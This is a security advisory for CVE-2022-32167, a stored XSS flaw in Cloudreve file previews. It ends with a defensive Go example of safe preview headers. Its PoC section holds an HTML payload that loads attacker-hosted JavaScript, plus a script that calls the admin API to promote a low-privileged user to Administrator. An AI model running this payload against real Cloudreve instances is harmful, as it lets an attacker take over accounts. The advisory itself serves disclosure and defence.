Headline
CVE-2022-32167: Mend Vulnerability Database
Date: May 31, 2022
Overview
Cloudreve versions v1.0.0 through v3.5.3 are vulnerable to Stored Cross-Site Scripting (XSS), via the file upload functionality. A low privileged user will be able to share a file with an admin user, which could lead to privilege escalation.
Details
Cloudreve versions v1.0.0 through v3.5.3 are vulnerable to Stored Cross-Site Scripting (XSS). When an attacker uploads a malicious HTML file containing JavaScript code, the file is stored as-is. When an admin user previews the file, the malicious code executes and runs with admin privileges.
PoC Details
Access the application and create a low-privileged user account from an admin user. Then, as the newly created user, upload the malicious HTML file containing malicious JavaScript code, as shown under "PoC Code". Create a preview share link and share it with the admin user. Once the admin user accesses the preview link, the XSS triggers and the low-privileged user is given the Administrator role.
PoC Code
XSS Payload Inside safe.html:
<script src=http://0.0.0.0:2222/lpeexploit.js></script>
JS Code Inside lpeexploit.js:
fetch("http://localhost:5212/api/v3/admin/user/2")
  .then(response => response.text())
  .then(data => {
    var post = JSON.parse(data);
    delete post.code;
    delete post.msg;
    post.user = post.data;
    delete post.data;
    var post2 = post.user;
    post2['GroupID'] = 1;
    var post_data = JSON.stringify(post);
    fetch("http://localhost:5212/api/v3/admin/user",
      {
        headers: {
          'Accept': 'application/json, text/plain, */*',
          'Content-Type': 'application/json',
        },
        method: "POST",
        body: post_data
      });
  });
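The PoC works only because the uploaded HTML is rendered as active content when previewed. The following added example (not Cloudreve's code or its fix) shows one way a Go preview handler can prevent that: only an allowlist of passive types is rendered inline, and everything else is forced to download. The names servePreview, previewResponse and inlineSafe, and the sample files, are assumptions made for illustration.

```go
package main

import (
	"fmt"
	"mime"
	"net/http"
	"net/http/httptest"
	"path/filepath"
	"strings"
)

// inlineSafe (hypothetical) allowlists passive types that may render inline.
// HTML, SVG and XML are deliberately absent: browsers run script from them.
var inlineSafe = map[string]string{
	".png": "image/png", ".jpg": "image/jpeg", ".jpeg": "image/jpeg",
	".gif": "image/gif", ".txt": "text/plain; charset=utf-8",
}

// servePreview (hypothetical) writes an uploaded file with headers that stop
// it from executing script in the application's origin.
func servePreview(w http.ResponseWriter, name string, body []byte) {
	h := w.Header()
	h.Set("X-Content-Type-Options", "nosniff")  // no MIME sniffing to text/html
	h.Set("Content-Security-Policy", "sandbox") // opaque origin, scripts disabled
	ctype, ok := inlineSafe[strings.ToLower(filepath.Ext(name))]
	if !ok {
		// Unknown or active type: never render, always download.
		ctype = "application/octet-stream"
		h.Set("Content-Disposition", mime.FormatMediaType("attachment",
			map[string]string{"filename": filepath.Base(name)}))
	}
	h.Set("Content-Type", ctype)
	w.Write(body)
}

// previewResponse runs servePreview against an in-memory recorder.
func previewResponse(name string, body []byte) *http.Response {
	rec := httptest.NewRecorder()
	servePreview(rec, name, body)
	return rec.Result()
}

func main() {
	// Constructed sample uploads; safe.html is the file name used in the PoC.
	for _, name := range []string{"safe.html", "photo.png"} {
		r := previewResponse(name, []byte("<script>/* constructed */</script>"))
		fmt.Printf("%-10s type=%q disposition=%q\n", name,
			r.Header.Get("Content-Type"), r.Header.Get("Content-Disposition"))
	}
}
```

Serving uploads from a separate origin that holds no session cookies gives the same isolation at the browser level.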
Affected Environments
3.0.0-beta1–3.5.3
Language: Go
Good to know:
- Severity Score
- Top Fix
Upgrade Version: No fix version available
- CVSS v3.1
Base Score: 5.4
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None